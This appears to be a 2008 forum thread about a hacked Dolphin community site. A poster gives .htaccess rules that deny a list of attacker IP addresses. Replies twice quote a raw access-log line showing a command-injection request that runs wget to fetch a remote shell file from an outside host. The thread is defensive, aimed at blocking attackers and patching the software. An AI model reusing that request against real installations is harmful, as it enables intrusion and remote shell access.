Today I happened to check a site that used dolphin and was hacked. I have found that they have deleted all the files from it and uploaded a script that fetch the contacts from orkut.com and sends the mail with a virus link (I am not posting that link here as that may be used by someone).
I have found those dolphin security issues that helped them to hack the sites. Currently I am in the process to develop the patch to fix all these issues. I know I will succeed in this.
I have checked that site and found many IPs that were used to hack the sites. I need to provide those IPs to all to block those IPs in your server.
To block these IPs in your host,
Open the file ".htaccess"
In the very beginning of it add the following.
<Files 403.shtml>
order allow,deny
allow from all
</Files>
deny from 72.37.237.58
deny from 209.147.127.217
deny from 64.106.212.3
deny from 207.249.0.39
deny from 61.100.0.185
deny from 75.102.21.29
deny from 82.165.253.62
deny from 212.122.200.198
deny from 61.222.167.139
deny from 204.2.183.2
deny from 62.65.159.212
deny from 61.152.188.244
deny from 66.98.214.4
deny from 216.180.239.124
deny from 209.147.127.216
deny from 216.17.101.237
deny from 74.52.133.2
deny from 89.108.67.119
deny from 67.228.37.156
deny from 195.70.36.107
deny from 85.235.153.11
deny from 202.164.225.11
deny from 70.85.102.132
deny from 66.218.77.68
deny from 203.146.102.38
deny from 72.9.246.154
deny from 66.113.100.51
deny from 79.180.146.69
deny from 193.34.16.75
deny from 72.36.159.108
deny from 216.127.94.127
deny from 83.170.74.164
deny from 213.186.38.21
deny from 207.210.91.2
deny from 67.228.181.76
deny from 202.221.143.111
deny from 64.15.136.210
deny from 203.157.185.8
deny from 200.149.77.40
deny from 217.172.29.12
Regards,
Praveen
125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute see more
yet you dont list one of the following ip's
125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute see more
I found this online tool. I think if anybody is building a local network It's better to block all other Ips except your country.
I hope this will be helpful.